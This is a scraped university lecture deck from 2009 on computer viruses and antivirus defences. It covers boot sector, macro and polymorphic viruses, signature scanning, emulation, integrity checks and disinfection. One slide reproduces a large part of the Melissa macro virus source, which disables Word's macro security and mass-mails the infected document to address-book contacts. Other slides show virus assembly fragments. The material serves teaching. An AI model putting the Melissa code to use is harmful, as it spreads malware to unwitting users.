77
CSE 127 CSE 127 Computer Security Computer Security Spring 2009 Spring 2009 Malware I: Viruses and virus-defense Malware I: Viruses and virus-defense Stefan Savage Stefan Savage Many sides courtesy Carey Nachenberg

CSE 127 Computer Security Spring 2009

  • Upload
    hashim

  • View
    27

  • Download
    0

Embed Size (px)

DESCRIPTION

CSE 127 Computer Security Spring 2009. Malware I: Viruses and virus-defense Stefan Savage. Many sides courtesy Carey Nachenberg. Recap. Various ways to compromise software systems based in input and timing Buffer overflows, format string errors, TOCTOU, SQL injection, XSS etc… - PowerPoint PPT Presentation

Citation preview

  • CSE 127Computer Security

    Spring 2009Malware I: Viruses and virus-defense

    Stefan SavageMany sides courtesy Carey Nachenberg

  • RecapVarious ways to compromise software systems based in input and timingBuffer overflows, format string errors, TOCTOU, SQL injection, XSS etcBut once youve compromised system, then what does the malicious software do?

    First: propagates itself to create an installed baseToday: viruses the oldest mass malware*

  • ReminderYou have a project due on Tuesday**

  • *VirusesA computer virus is a (malicious) program Attaches to a host program or data Creates (possibly modified) copies of itselfPayload of program may have other effects (deleting files, opening backdoors, printing messages, etc)

    Viruses traditionally require some user action to activate (i.e. execute some file, open some spreadsheet, etc)

  • *Virus Writers GoalsHard to detectHard to destroy or deactivateSpreads infection widely/quicklyCan reinfect a hostEasy to create

  • *Kinds of VirusesBoot Sector VirusesHistorically important, but less common todayMemory Resident VirusesStandard infected executableMacro VirusesEmbedded in documents (like Word docs)E-mail/IM VirusesSpread via attachmentsWeb platform virusesSpread on Web sites (e.g. social net applications)

  • **Boot sector Viruses (old school)Bootstrap Process:Firmware (ROM) copies MBR (master boot record) to memory, jumps to that programMBR (or Boot Sector)Fixed position on diskChained boot sectors permit longer Bootstrap Loaders MBRbootboot

  • *Boot sector VirusesVirus breaks the chainInserts virus codeReconnects chain afterwards MBRbootbootvirus

  • **Why attack the Bootstrap?Automatically executed before OS is runningAny thus, before detection tools are runningOS hides boot sector information from usersHard to discover that the virus is thereHarder to fix

    Any good virus scanning software scans the boot sectorsBut good bootsector viruses may restore good bootsector during normal operation (replace it when you logout or when anti-virus software isnt running)Bootsector malware is back with a vengeance (Meebroot/Sinowal)

  • **Virus Attachment to Host CodeSimplest case: insert copy at the beginning of an executable fileRuns before other code of the programHistorically most common program virusRuns before & after original programVirus can clean up after itselfVirus could modify code in placeDoesnt change size, but could change behaviorMaybe harder to detect?

    OriginalProgram

    ModifiedProgram

  • *Other virus tricksEntry-point obscuring virusesVirus takes control in middle of program (random code point) and is harder to scan forPolymorphic virusesVirus encrypts body with random key in each generationMetamorphic virusesVirus rewrites self in each generator (semantically equivalent, but different instruction stream)Instruction substitution, control flow rewriting, etc

  • *Other Homes for VirusesSystem SoftwareIO.sys, NTLDR, NTDETECT.COMautoexec.bat, config.sys, command.com

    Memory resident softwareTask managerWindow managerWinampRealPlayer

  • **Macro VirusesMany applications support MacrosMacros are just programsWord processors & SpreadsheetsStartup macroMacros turned on by default

    Visual Basic Script (VBScript)

  • *Melissa Macro VirusImplementationVBA (Visual Basic for Applications) code associated with the "document.open" method of Word

    StrategyEmail message containing an infected Word document as an attachment (social engineering)Opening Word document triggers virus if macros are enabledUnder certain conditions included attached documents created by the victim

  • **Melissa Macro Virus: BehaviorSetupLowers the macro security settings Permit all macros to run without warningChecks registry for key value by KwyjiboHKEY_Current_User\Software\Microsoft\Office\Melissa?

    PropagationSends email message to the first 50 entries in every Microsoft Outlook MAPI address book readable by the user executing the macro

  • **Melissa Macro Virus: BehaviorPropagation ContinuedInfects Normal.doc template file Normal.doc is used by all Word documents

    JokeIf minute matches the day of the month, the macro inserts message Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here.

  • **// Melissa Virus Source Code

    Private Sub Document_Open()On Error Resume NextIf System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") ""ThenCommandBars("Macro").Controls("Security...").Enabled = FalseSystem.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&ElseCommandBars("Tools").Controls("Macro").Enabled = FalseOptions.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):Options.SaveNormalPrompt = (1 - 1)End IfDim UngaDasOutlook, DasMapiName, BreakUmOffASliceSet UngaDasOutlook = CreateObject("Outlook.Application")Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")

  • If System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") "... by Kwyjibo"ThenIf UngaDasOutlook = "Outlook" ThenDasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " &Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don'tshow anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next yDasMapiName.LogoffEnd If

  • **Melissa VirusTransmission RateThe first confirmed reports of Melissa were received on Friday, March 26, 1999. By Monday, March 29, it had reached more than 100,000 computers. One site got 32,000 infected messages in 45 minutes. DamageDenial of service: mail systems off-line. Could have been much worseRemedyFilter mail for virus signature (macro in .doc files)Dont run Macros in unknown documents by defaultClean Normal.doc

  • *Detecting VirusesScanningIntegrity checkingHeuristic detection

  • *Virus SignaturesViruses cant be completely invisible:Code must be stored somewhereVirus must do something when it runsIdea: look in files for signature byte sequences that are unique to the virusIssuesWhere to scan (beginning of file, whole file, registry settings, etc)How to scan (look for ILOVEYOU string, or actually execute program)How long to scan (tradeoffs in performance/coverage)How to distinguish polymorphs (research issue)

  • 1. User runs an infected program.2. Program transfers control to the virus.The Simple Virus

  • 3. Virus locates a new program.0100 B435 MOV AH,350102 B021 MOV AL,210104 CD21 INT 210106 8C06A002 MOV [02A0],ES010A 891E9E02 MOV [029E],BX010E B425 MOV AH,250110 B021 MOV AL,210112 BA2001 MOV DX,01200115 CD21 INT 21

    The Simple Virus

  • 5. Virus updates the new program so the virus gets control when the program is launched.0100 B435 MOV AH,350102 B021 MOV AL,210104 CD21 INT 210106 8C06A002 MOV [02A0],ES010A 891E9E02 MOV [029E],BX010E B425 MOV AH,250110 B021 MOV AL,210112 BA2001 MOV DX,01200115 CD21 INT 21

    0117 83C24F ADD DX,+4F011A 8BFA MOV DI,DX011C 81FF8000 CMP DI,00800120 725E JB 01870122 7406 JZ 01310124 C606250273 MOV BYTE PTR [0225],730129 90 NOP012A FEC5 INC CH012C 7303 JNB 0138012E 80C140 ADD CL,400132 B8010C MOV AX,0C010135 8BD6 MOV DX,SI0137 CD13 INT 13The Simple Virus

  • *Head/Tail ScannersMost of these application-infecting viruses attached themselves to either the top or bottom of the host file:HostVirusHostVirusSo anti-virus engineersbuilt head/tail scanners.The scanner loads thehead and tail regionsof the file into a bufferand then scans witha multi-string searchalgorithm.

  • *So what do the bad guys do?Move the virus to the middle of the fileBecomes prohibitively expensive to scanMust scan whole file

    Solution: scalpel scanningIdea: limit scanning to likely entry-points for virusesIf you have more time you can also scan for more than just strings (regular expressions)

  • *0100 EB04 JMP 1060102 B021 MOV AL,210104 CD21 INT 210106 EB09 JMP 1120108 B404 MOV AH, 04010A 891E9E02 MOV [029E],BX010E B425 MOV AH,250110 B021 MOV AL,210112 E90200 JMP 1170115 CD21 INT 21

    0117 83C24F ADD DX,+4F011A 8BFA MOV DI,DX011C 81FF8000 CMP DI,00800120 725E JB 01870122 7406 JZ 01310124 C606250273 MOV BYTE PTR [0225],730129 90 NOP012A FEC5 INC CH012C 7303 JNB 0138012E 80C140 ADD CL,400132 B8010C MOV AX,0C010135 8BD6 MOV DX,SI0137 CD13 INT 13Scalpel ScanningLocate the main program entry-point.

    While the current instruction is a JUMP or a CALL instruction, trace it.

    If the current instruction is not a JUMP or CALL instruction, search for all fingerprints in this region of the file.

  • *The Encrypted VirusHOSTHOSTSoon after the first generation of executable viruses, virus authors began writing self-encrypting strains.These viruses carry a small decryption loop that runs first, decrypts the virus body and then launches the virus.Each time the virus infects a new file, it changes the encryption key so the virus body looks different.

  • *MOV DI, 120hMOV AX, [DI]XOR AX, 5132hMOV [DI], AXADD DI, 2hCMP DI, 2500hJNE 38. WJSVTPBMZPL9. NAADJGNANW...Still easy to detect because the decryption loop stays the same.The Encrypted VirusThe decryption routine stays the same. Only the key(s) change.MOV DI, 120hMOV AX, [DI]XOR AX, 0030hMOV [DI], AXADD DI, 2hCMP DI, 2500hJNE 38. PKEPAJHENZAW9. MNANTPOOTIZN...The encrypted body changes.

  • *The Polymorphic VirusPolymorphic viruses are self-encrypting viruses with a changing decryption algorithm

    When infecting a new file, such a virus:Generates brand-new decryption code from scratchEncrypts a copy of itself using a complementary encryption algorithmInserts both the new decryption code and the encrypted body of the virus into target file

  • *Host ProgramRAMDecryption Loop1. User Executes ProgramThe Polymorphic Virus

  • *Host ProgramRAMDecryption Loop1. User Executes Program2. Virus Decrypts ItselfDecryption LoopThe Polymorphic Virus

  • *Host ProgramRAMDecryption Loop1. User Executes Program2. Virus Decrypts ItselfDecryption LoopThe Polymorphic Virus

  • *Host ProgramRAMDecryption Loop1. User Executes Program2. Virus Decrypts ItselfDecryption LoopThe Polymorphic Virus

  • *Host ProgramRAMDecryption Loop3. Virus finds new prog.Decryption LoopThe Polymorphic Virus

  • *Host ProgramRAMDecryption LoopDecryption LoopHost Program(New)4. Mutation engine creates new decryptor.3. Virus finds new prog.The Polymorphic Virus

  • *Host ProgramRAMDecryption LoopDecryption LoopHost Program(New)5. Virus makes a new copy of itself and encrypts this copy.The Polymorphic Virus

  • *Host ProgramRAMDecryption LoopDecryption LoopHost Program(New)5. Virus makes a new copy of itself and encrypts this copy.The Polymorphic Virus

  • *Host ProgramRAMDecryption LoopDecryption LoopHost Program(New)5. Virus makes a new copy of itself and encrypts this copy.The Polymorphic Virus

  • *Host ProgramRAMDecryption LoopDecryption LoopHost Program(New)5. Virus makes a new copy of itself and encrypts this copy.The Polymorphic Virus

  • *Host ProgramRAMDecryption LoopDecryption LoopHost Program(New)The Polymorphic Virus

  • *Host ProgramRAMDecryption LoopDecryption LoopHost Program(New)The Polymorphic Virus

  • *RAMDecryption LoopHost Program(New)And we have a new infection!The Polymorphic Virus

  • *The Polymorphic VirusAddr Machine Code Mnemonic0100 50 PUSH AX0101 B8347E MOV AX,7E340104 25A907 AND AX,07A90107 95 XCHG BP,AX0108 B840B2 MOV AX,B240010B BABBB8 MOV DX,B8BB010E F7EA IMUL DX0110 93 XCHG BX,AX0111 B8B4D2 MOV AX,D2B40114 03C3 ADD AX,BX0116 2BC5 SUB AX,BP0118 BA479A MOV DX,9A47011B F7E2 MUL DX011D 95 XCHG BP,AX011E B809F4 MOV AX,F4090121 2BC5 SUB AX,BP0123 91 XCHG CX,AX0124 B8AB6A MOV AX,6AAB0127 BA972C MOV DX,2C97012A F7E2 MUL DX012C D1C0 ROL AX,1012E 80E11F AND CL,1F0131 D3E0 SHL AX,CL0133 91 XCHG CX,AX0134 B8E1CE MOV AX,CEE10137 03C1 ADD AX,CX0139 93 XCHG BX,AX013A B84A43 MOV AX,434A013D 29C3 SUB BX,AX013F F7DB NEG BX0141 8B86381B MOV AX,[BP+1B38]0145 8ACB MOV CL,BL 0147 D3C8 ROR AX,CL0149 2D23C9 SUB AX,C923014C B108 MOV CL,08014E D3C8 ROR AX,CL0150 8786381B XCHG AX,[BP+1B38]0154 B80765 MOV AX,65070157 BA55B3 MOV DX,B355015A F7E2 MUL DX015C 96 XCHG SI,AX015D 8BC5 MOV AX,BP015F 2BC6 SUB AX,SI0161 BAE337 MOV DX,37E30164 F7E2 MUL DX0166 96 XCHG SI,AX0167 B80765 MOV AX,6507016A BA55B3 MOV DX,B355016D F7E2 MUL DX016F 91 XCHG CX,AX0170 8BC6 MOV AX,SI0172 BACBC5 MOV DX,C5CB0175 F7E2 MUL DX0177 03C1 ADD AX,CX0179 95 XCHG BP,AX017A 45 INC BP017B 45 INC BP017C 75A0 JNZ 011EHere we have a decryption loop from an MtE-based virus infection.And heres a second generation decryption loop of the same virus strain.

  • *Detecting The Polymorphic VirusSo how do we detect such a beast?B98104%F%1BD????%FBE????%F%53142??%F??C0%F45%F??CC%FE2B98104%8BB????%FBE????%F%53140??%F??C0%F43%F??CC%FE2B98104%F%5BE????%F%53144??%F??C0%F46%F??CC%FE2B98104%F%9BF????%F%53145??%F??C0%F47%F??CC%FE2B98104%F%1BD????%FBF????%F%53143??%F??C0%F47%F??CC%FE2B98104%8BB????%F%1BF????%F%53141??%F??C0%F47%F??CC%FE2The number of strings (alg. sigs) explodes quickly!Detecting the decryption loop is prone to false positives! 1. Use lots of wildcard strings strings/scripts:2. X-ray techniques (plaintext attack on encrypted virus body)

  • *Assume the file is infected and perform a plain-text attack of the encrypted virus code. This only works for simple schemes (but its often sufficient).X-ray scanningHost Program7 bytes from EOF = VIRUS?AMBCAPQYEQYQWERQWERQWERERGQWETWLRW

  • *Generic DecryptionInvented by Alan Solomon (a.k.a. Dr. Solomon)Chose name to obscure how it workedAssumptionsVirus gains control of the host immediatelyVirus decrypts itself deterministicallyVirus has a some static body that can be detected with traditional signaturesKey idea:Emulate code execution until the virus decrypts itselfTypically use some sort of virtual machine (VM) environmentSearch for signatures in memory

  • *Host ProgramDecryption LoopVirtual Machine1. Load suspected program into VM.Program Off DiskGeneric Decryption

  • *Generic DecryptionVirtual Machine1. Load suspected program into VM.2. Allow the program to execute normally.3. Tag all modified memory as the program executes.1. Fetch Byte2. Decrypt Byte3. Store Byte4. Loop to 1

  • *Virtual Machine

  • *

  • *

  • *

  • *

  • *

  • *

  • *4. Scan all modified areas of virtual memory for virus signatures.

  • *Generic DecryptionVirtual Machine4. Scan all modified areas of virtual memory for virus signatures.Host ProgramDecryption LoopMutation EngineVirus3. Tag all modified memory as the program executes.xxxxKILL KILL KILL

  • *Challenges with GDHow long to emulate program?Emulate too long and the system slows to a crawlDont emulate enough and you might miss the virus

    Two approachesHeuristic-driven emulationEmulate while you see suspicious behaviorUnusual instruction sequences, sequence modifications of memory, etcSuffers from false positives and false negatives & can be avoidedProlong execution on uninfected filesProfile driven emulation

  • *Profile-based EmulationFor each new polymorphic virus strain, engineers identify its key characteristics and then add this profile to the anti-virus data files.Fetch and emulate instructions from a program fileas long as its instructions are consistent with atleast one polymorphic virus profile.When all viruses have been eliminated from consideration, cease emulation.

  • *DSCE 1001000000..MtE 0111000001..SMEG 0001000111..ADD opcodeSUB opcodeXOR opcodeINC opcodeMOV opcodeROL opcodeINT opcodeDEC opcodeNOP opcodeJMP opcode... ...Profile-based Emulation

  • *DSCE 1001000000..MtE 0111000001..SMEG 1001000111..ADD opcodeSUB opcodeXOR opcodeINC opcodeMOV opcodeROL opcodeINT opcodeDEC opcodeNOP opcodeJMP opcode... ...0100 JMP 1170102 MOV AL,210104 INT 210106 MOV [02A0],ES010A MOV [029E],BX010E MOV AH,250110 MOV AL,210112 MOV DX,01200115 INT 21

    0117 ADD DX,+4F011A MOV DI,DX011C CMP DI,00800120 JB 01870122 JZ 01310124 MOV BYTE PTR [0225],730129 NOPProfile-based Emulation

  • *DSCE 1001000000..MtE 0111000001..SMEG 1001100111..ADD opcodeSUB opcodeXOR opcodeINC opcodeMOV opcodeROL opcodeINT opcodeDEC opcodeNOP opcodeJMP opcode... ...0100 JMP 1170102 MOV AL,210104 INT 210106 MOV [02A0],ES010A MOV [029E],BX010E MOV AH,250110 MOV AL,210112 MOV DX,01200115 INT 21

    0117 ADD DX,+4F011A MOV DI,DX011C CMP DI,00800120 JB 01870122 JZ 01310124 MOV BYTE PTR [0225],730129 NOPProfile-based Emulation

  • *DSCE 1001000000..MtE 0111000001..SMEG 1001100111..ADD opcodeSUB opcodeXOR opcodeINC opcodeMOV opcodeROL opcodeINT opcodeDEC opcodeNOP opcodeJMP opcode... ...0100 JMP 1170102 MOV AL,210104 INT 210106 MOV [02A0],ES010A MOV [029E],BX010E MOV AH,250110 MOV AL,210112 MOV DX,01200115 INT 21

    0117 ADD DX,+4F011A MOV DI,DX011C CMP DI,00800120 JB 01870122 JZ 01310124 MOV BYTE PTR [0225],730129 NOPProfile-based Emulationand so on...

  • *Profile-based EmulationPoly #1aPoly #1bPoly #3Poly #4Poly #2Poly #5Poly #3bThe profiles are specific to each polymorphic virus, limiting the search space. This reduces the number of iterationsrequired on uninfected files.

  • *ProblemsTime consuming to generate profilesAnd if you get one wrong you can miss stuffLots of ways to get around GDRandom virusesV will only run if the time is between 3 and 4pmEmulator-aware virusesV detects its in an emulator and hides Maxed-out iteration virusesV takes too long to emulateEntry-point Obscuring Viruses

  • *Entry-point Obscuring VirusesThese viruses do notgain control at the main program entry-point.Instead, they modify the host program to transfer controlto the virus at some obfuscated point in the program.MZPESection #1 InfoSection #2 InfoSection #3 InfoSection #4 Infocode code code code code codcode code code code code codcode code code code code codcode code code code code codcode code code code code codcode code code code code codcode code code code code codcode code code code code coddata data data data data data ddata data data data data data ddata data data data data data ddata data data data data data d.reloc .reloc .reloc .reloc .relo.reloc .reloc .reloc .reloc .relo.reloc .reloc .reloc .reloc .relo.reloc .reloc .reloc .reloc .relo

  • *What to doTailored code written to detect each strain of virus (knowledgeable about EPO approach)Typically low-level pseudo-code which evaluates program and can invoke emulator when necessaryFast to execute but can be time-consuming to write

    But it gets worseMetamorphic virusesIntegrated infection

  • *The Metamorphic VirusThese viruses rewrite their logic in each new infection! They have no byte-level fingerprint anywhere!Metamorphic strains use the current infections code as a template and then expand and contract sets of instructions within the body to create a child infection.

  • *Rather than appending a single large chunk of code to target files, integrated infectors disassemble their host, integrate their logic throughout the original logic, and reassemble.Problem: There is no big chunk of code to identify and scan. Disinfection is a nightmare.Integrated infection

  • *Summary: Modern AV programsIts not grep

    Carefully constructed dictionary of known virus signaturesComplex algorithmic signatures, not just stringsWhole system emulator executes programs in sandbox, scanning for signatures during executionHeuristics to determine how long to emulate, when to emulate etc. Lots of tricks for speed

  • *Virus Scanning: Pros & ConsProsEffectively detects known viruses before they can cause harmFew false alarms

    ConsCan detect only viruses with known signaturesAssumption is that samples can be obtainedSignature set must be kept up to dateCan take 5mins to identify simple signature, days for complex oneSignature set must be distributed to all clientsSymantec pushes 1.4B updates per day (~60TB)Virus writers can easily change virus signaturesPackersFundamentally a reactive business

  • *InnoculationMost viruses use so kind of marker to identify infected filesInnoculation: add the marker to clean files so they wont be infected

    Drawbacks:Markerless or implicit marker viruses (e.g. file size, checksum)Lots of different markers for different viruses; need to change all files

  • *Integrity Checks & whitelistsVirus scanner computes hash or checksum of executable files (or downloads hash of known good files)Assumed to be virus free!Stores the hash information

    Verifies new hash vs. saved one during scan

  • *Integrity Checks: Pros & ConsProsCan detect corruption of executables tooReliableDoesnt require virus signatures

    ConsFalse positives (i.e. recompilation, updates)Cant use it on documents (they change too often)

  • *Behavior-based DetectionCollection of ad hoc rules that identifies virus behavior or virus-like programsUnusual system call behaviorE.g. if you try to transmit a buffer that contains the contents of a stack buffer you received from the networkUncommon syscall/argument patterns from each codepoint Modification of system executables/templatesnormal.docSelf-modifying and self-referential codeRarely use instructions or lots of NOPsThis is where the action was until very recently

  • *Behavior-based detection:Pros & ConsProsPerhaps able to detect unknown viruses

    ConsGood heuristics are hard to developBad heuristics have too many false positives

    All major AV programs have moved to incorporate behavioral techniques

  • *DisinfectionOk, you found a virus in a file now what?Standard disinfectionVirus saves the beginning of the file it overwrites (for control transfer) so it can correctly execute it laterTo clean: find virus, find original host file beginning, find size of virus. Now move original code to beginning, and truncate file to eliminate virus codeSpecialized to each virusGeneric disinfectionRun program and emulate until it restores the file to its normal state (so it can execute normally); let the virus itself do the tough workRewrite cleaned program back to diskWorks with roughly covers 70% of virusesProblems: viruses that overwrite code, viruses with unknown entry points, viruses not well modeled by heuristics when is image clean?)

  • *Next timeNext time: Worms (and maybe bots)

    *******************************************************************************